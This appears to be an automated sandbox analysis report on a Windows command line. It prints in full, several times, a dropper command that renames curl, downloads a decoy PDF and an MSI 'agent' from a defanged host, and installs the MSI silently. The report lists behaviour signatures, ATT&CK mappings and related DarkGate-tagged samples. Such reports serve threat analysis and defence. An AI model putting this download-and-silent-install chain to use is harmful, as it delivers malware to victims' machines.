Windows Analysis Report

Overview

General Information

Analysis ID:1528042
Infos:

Detection

Score:8
Range:0 - 100
Whitelisted:false
Confidence:40%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6456 cmdline: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6724 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d "C:\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • TNheBOJElq.exe (PID: 6796 cmdline: TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • TNheBOJElq.exe (PID: 6844 cmdline: TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • msiexec.exe (PID: 6884 cmdline: C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7004 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3756, ProcessCommandLine: cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", ProcessId: 6456, ProcessName: cmd.exe
No Suricata rule has matched

There are no malicious signatures.

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00E4F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4F820 CryptAcquireContextA,CryptCreateHash,3_2_00E4F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,3_2_00E4F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E46400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00E46400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,3_2_00E4EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E46591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00E46591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,3_2_00E4C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E43EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,3_2_00E43EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_00E4C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4C730 CryptHashData,3_2_00E4C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: -----BEGIN PUBLIC KEY-----3_2_00E277F7
Source: TNheBOJElq.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: unknownDNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1D8C0 recv,WSAGetLastError,3_2_00E1D8C0
Source: TNheBOJElq.exeString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.drString found in binary or memory: Usage: curl [options...] <url>
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.drString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: classification engineClassification label: clean8.win@11/3@1/0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E0310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,3_2_00E0310D
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: secur32.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,3_2_00E1D33A
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe (dropped file)
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-41215
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeAPI coverage: 3.3 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: TNheBOJElq.exe, 00000003.00000003.1638561356.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000004.00000003.1641387385.0000000003460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E5155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E50CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00E50CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E516BE SetUnhandledExceptionFilter,3_2_00E516BE
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\qmqjabdqio.pdf" hxxps://dbs5.pwods.com/download/pdf & "c:\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi hxxps://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E5137A cpuid 3_2_00E5137A
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E51775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00E51775
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E3A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,3_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E4699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,3_2_00E4699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E38490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,3_2_00E38490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exeCode function: 3_2_00E1DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,3_2_00E1DEDF
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 12 Command and Scripting Interpreter; 1 Native API; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 1 Masquerading; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 1 System Time Discovery; 11 Security Software Discovery; 1 Process Discovery; 22 System Information Discovery; Internet Connection Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 2 Encrypted Channel; 1 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
[Behavior graph. ID: 1528042; Cookbook: defaultwindowscmdlinecookbook.jbs; Startdate: 07/10/2024; Architecture: WINDOWS; Score: 8]

No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe | 0% | ReversingLabs | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
241.42.69.40.in-addr.arpa | unknown | unknown | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr | false | | unknown
https://curl.se/docs/copyright.htmlD | TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr | false | | unknown
https://curl.se/libcurl/c/curl_easy_setopt.html | TNheBOJElq.exe.0.dr | false | | unknown
https://curl.se/P | TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr | false | | unknown
https://curl.se/docs/http-cookies.html# | TNheBOJElq.exe | false | | unknown
https://curl.se/docs/http-cookies.html | TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr | false | | unknown
https://curl.se/docs/hsts.html# | TNheBOJElq.exe | false | | unknown
https://curl.se/docs/sslcerts.html | TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr | false | | unknown
https://curl.se/docs/sslcerts.htmlcurl | TNheBOJElq.exe | false | | unknown

No contacted IP infos
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1528042
                      Start date and time:2024-10-07 14:41:17 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 33s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowscmdlinecookbook.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:CLEAN
                      Classification:clean8.win@11/3@1/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 25
                      • Number of non-executed functions: 282
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes were analyzed, report is missing behavior information
                      No simulations
                      No context
                      Match: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                      Associated Sample Name / URL | Detection | Threat Name
                      8SdvyePo6j.docm | malicious | Unknown
                      New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | malicious | Unknown
                      https://rocksecuritymw.com/mus/?81367511 | malicious | DarkGate
                      https://taskbes.com/ttse/?75486511 | malicious | DarkGate
                      https://ledscreen.africa/dcil/?77391211 | malicious | DarkGate
                      m7q7gcniEz.exe | malicious | Unknown
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):470528
                                  Entropy (8bit):6.743680599799538
                                  Encrypted:false
                                  SSDEEP:12288:sUE03qxFqJC1cwgysc/2gIsJFBhlyAjoSYgq:sUE06qCSwgbW2gpD3sAkSYgq
                                  MD5:44E5BAEEE864F1E9EDBE3986246AB37A
                                  SHA1:6EDAE73E36B61B261369717EA3657A6783EBA872
                                  SHA-256:4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB
                                  SHA-512:DC39C1E4F59FCAC4A0A6D6B0AD890F351B5D6655B3173950B8EB4A03419311D0020D86F4868A001DF5CE270DE570B86C4F8AB86473F65E678C5A3493949305EA
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: 8SdvyePo6j.docm, Detection: malicious, Browse
                                  • Filename: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm, Detection: malicious, Browse
                                  • Filename: , Detection: malicious, Browse
                                  • Filename: , Detection: malicious, Browse
                                  • Filename: , Detection: malicious, Browse
                                  • Filename: m7q7gcniEz.exe, Detection: malicious, Browse
                                  Reputation:low
                                  Process:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                  File Type:ASCII text, with CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):65
                                  Entropy (8bit):4.321712528700369
                                  Encrypted:false
                                  SSDEEP:3:3JtNVFXFd8wTiAA6tNxCHxo:3JtNvXFGN56t7CRo
                                  MD5:DA85F2BE49ADA4247D5F608DEBE3F48F
                                  SHA1:97797305121C74B624F9BD19AF3A113E34980CBA
                                  SHA-256:4F3720C8F1696E0C61A3969921E08E4910BA6CFEFFF60EFC3E5F020916D6551C
                                  SHA-512:F4A058D2572EEE922F06376F0A92D7331A8BE1E3C3E3531E2ECC1D989B1243E7A41669D7AC17B3480CB3136882BAD60FB5A567E3D173B13767AAC068F911C02B
                                  Malicious:false
                                  Reputation:low
                                  Preview:curl: (1) Protocol "hxxps" not supported or disabled in libcurl..
                                  No static file info
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Oct 7, 2024 14:42:39.188973904 CEST | 53 | 60800 | 162.159.36.2 | 192.168.2.4
                                  Oct 7, 2024 14:42:39.640908957 CEST | 62445 | 53 | 192.168.2.4 | 1.1.1.1
                                  Oct 7, 2024 14:42:39.648832083 CEST | 53 | 62445 | 1.1.1.1 | 192.168.2.4

                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Oct 7, 2024 14:42:39.640908957 CEST | 192.168.2.4 | 1.1.1.1 | 0x8721 | Standard query (0) | 241.42.69.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false

                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Oct 7, 2024 14:42:39.648832083 CEST | 1.1.1.1 | 192.168.2.4 | 0x8721 | Name error (3) | 241.42.69.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false


                                  Target ID:0
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
